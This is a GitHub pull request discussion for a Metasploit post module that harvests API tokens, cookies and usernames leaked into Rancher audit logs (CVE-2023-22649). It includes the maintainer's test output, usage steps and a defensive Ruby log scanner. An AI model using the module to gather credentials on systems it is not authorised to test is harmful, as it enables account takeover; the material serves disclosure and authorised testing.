new post module: rancher audit logs sensitive information leak (CVE-2023-22649) #18962
} | ||
) | ||
) | ||
register_advanced_options [ |
register_advanced_options [ | |
# docker install, and default path according to https://ranchermanager.docs.rancher.com/how-to-guides/advanced-user-guides/enable-api-audit-log#api-audit-log-options | |
register_options [ |
I know this is unlikely to be changed, but in the event it needs to be changed, users should see it. I'd also be fine if this got left as an advanced option and the warning message contained a reference to changing the advanced option.
usernames_found += usernames | ||
end | ||
|
||
usernames_found.uniq.each do |username| |
Any reason not to store these directly?
Store them as in creds? If so, because it's only a username and from my memory we don't store just usernames.
I made a couple of minor changes in f579ec7 to fix the table printing and document the version I used for testing. Once those changes pass the auto-tests, I'll get this landed. Thanks!
Testing Output (rancher v2.8.1):

```
metasploit-framework (S:2 J:1) post(linux/gather/rancher_audit_log_leak) > rerun
[*] Reloading module...
[+] Rancher log saved to: /home/smcintyre/.msf4/loot/20240410112703_default_192.168.159.13_rancher.api.log_376359.txt
[+] Found X-Api-Auth-Header Bearer TOTESLEGITLOLZ
[+] Found X-Api-Set-Cookie-Header: __cf_bm=qJZbh1XgMjrlnXDN97fsTR_Uj85He5TfPGtGug7xS5I-1712762186-1.0.1.1-wVGWMfCxXh8TpMzB4HCyiZ2YLwBclH3JggRCz_cOXoP4h_LKcIjXoTA_fjNjyg6DRd421yKhE.t222optKu5ZG2zZm.7oFnLDe8hw.jWNsc; path=/; expires=Wed, 10-Apr-24 15:46:26 GMT; domain=.digitalocean.com; HttpOnly; Secure; SameSite=None
[+] Found X-Api-Auth-Header token-876ss:v9q46nxt4grflb9mqn5s2d54bzscjstp48zzrpt6trdjkz52tns98q
[+] Found X-Amz-Security-Token FINDME
Leaked Information
==================

Field                     Value                                                                                                                                            Location
-----                     -----                                                                                                                                            --------
Username                  admin                                                                                                                                            Requests
X-Amz-Security-Token      FINDME                                                                                                                                           requestHeader
X-Api-Auth-Header         Bearer TOTESLEGITLOLZ                                                                                                                            requestHeader
X-Api-Auth-Header         token-876ss:v9q46nxt4grflb9mqn5s2d54bzscjstp48zzrpt6trdjkz52tns98q                                                                               requestHeader
X-Api-Set-Cookie-Header   __cf_bm=qJZbh1XgMjrlnXDN97fsTR_Uj85He5TfPGtGug7xS5I-1712762186-1.0.1.1-wVGWMfCxXh8TpMzB4HCyiZ2YLwBclH3JggRCz_cOXoP4h_LKcIjXoTA_fjNjyg6DRd421yK  responseHeader
                          hE.t222optKu5ZG2zZm.7oFnLDe8hw.jWNsc; path=/; expires=Wed, 10-Apr-24 15:46:26 GMT; domain=.digitalocean.com; HttpOnly; Secure; SameSite=None

[*] Post module execution completed
metasploit-framework (S:2 J:1) post(linux/gather/rancher_audit_log_leak) >
```
### Install | ||
|
||
Run the following docker command: | ||
`docker run -d --restart=unless-stopped -p 80:80 -p 443:443 -e AUDIT_LEVEL=3 -v /var/log/rancher/auditlog:/var/log/auditlog --privileged rancher/rancher:v2.6.0` |
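Review bot: the install command in the docs pins `rancher/rancher:v2.6.0` and sets `AUDIT_LEVEL=3`, while the PR description states that only deployments with `AUDIT_LEVEL` of 1 or above are affected and the maintainer's test output in this thread is from v2.8.1; state in the docs which image tags the module was actually verified against and add a sentence explaining that any `AUDIT_LEVEL` >= 1 is sufficient to reproduce the leak, so readers do not assume level 3 is required.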
I had trouble getting this to work and ended up changing the version number to 2.8.1. It was definitely an issue with the docker image though and not the module.
Release Notes

This adds a post module to leverage CVE-2023-22649, which is a sensitive information leak in the rancher service's audit logs.

Rancher versions between 2.6.0-2.6.13, 2.7.0-2.7.9, 2.8.0-2.8.1 inclusive
contain a vulnerability where sensitive data is leaked into the audit logs.
Rancher Audit Logging is an opt-in feature; only deployments that have it
enabled and have AUDIT_LEVEL set to 1 or above are impacted by this issue.
Tested against rancher 2.6.0.
Verification

List the steps needed to make sure this thing works

- `use post/linux/gather/rancher_audit_log_leak`
- `set session [#]`
- `run`
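As an added defender-side example (not code from the PR or from the module it adds), the Ruby below scans Rancher audit-log JSON lines for the headers the module reports and prints them redacted, so an operator who had audit logging enabled on an affected version can tell which secrets to rotate. The field names `auditID`, `requestHeader`, `responseHeader` and `user.name`, and the extra headers beyond the three named in this thread, are assumptions based on Rancher's audit-log format; the sample lines are constructed.

```ruby
require 'json'
require 'stringio'

# Headers CVE-2023-22649 leaves in clear text. The first three are the ones the
# module reports; the rest are an assumption for this example. Case-insensitive.
SENSITIVE_HEADERS = %w[
  X-Api-Auth-Header X-Api-Set-Cookie-Header X-Amz-Security-Token
  Authorization Cookie Set-Cookie
].freeze

# One audit entry per line; requestHeader/responseHeader map a header name to an
# array of values. Returns one finding per leaked value; unparsable lines are
# skipped instead of aborting the scan.
def scan_audit_line(line)
  entry = JSON.parse(line)
  return [] unless entry.is_a?(Hash)
  %w[requestHeader responseHeader].flat_map do |section|
    (entry[section] || {}).flat_map do |name, values|
      next [] unless SENSITIVE_HEADERS.any? { |h| h.casecmp?(name) }
      Array(values).map do |v|
        { audit_id: entry['auditID'], location: section, header: name, value: v }
      end
    end
  end
rescue JSON::ParserError
  []
end

def scan_audit_log(io)
  io.each_line.flat_map { |line| scan_audit_line(line) }
end

# Distinct identities seen in the log (what the module lists as "Username").
def audit_usernames(io)
  io.each_line.map { |l| JSON.parse(l).dig('user', 'name') rescue nil }.compact.uniq
end

# Show just enough of a leaked value to identify which secret to rotate.
def redact(value)
  value.length > 8 ? "#{value[0, 4]}...#{value[-4, 4]}" : '****'
end

# Constructed sample entries; the token strings are the PR's own test values.
SAMPLE_LOG = <<~LOG
  {"auditID":"a1","requestURI":"/v3/clusters","method":"GET","user":{"name":"admin"},"requestHeader":{"X-Api-Auth-Header":["Bearer TOTESLEGITLOLZ"],"Accept":["application/json"]},"responseHeader":{"Content-Type":["application/json"]}}
  {"auditID":"a2","requestURI":"/v3/settings","method":"GET","user":{"name":"admin"},"requestHeader":{"x-amz-security-token":["FINDME"]},"responseHeader":{"X-Api-Set-Cookie-Header":["__cf_bm=abc; path=/; HttpOnly; Secure"]}}
  not a json line
LOG

scan_audit_log(StringIO.new(SAMPLE_LOG)).each { |f| puts "#{f[:audit_id]} #{f[:location]} #{f[:header]}: #{redact(f[:value])}" }
```

Point `scan_audit_log` at the real file (the docs mount it at `/var/log/auditlog` in the container) to check a live deployment; any finding means the corresponding token or cookie should be treated as exposed.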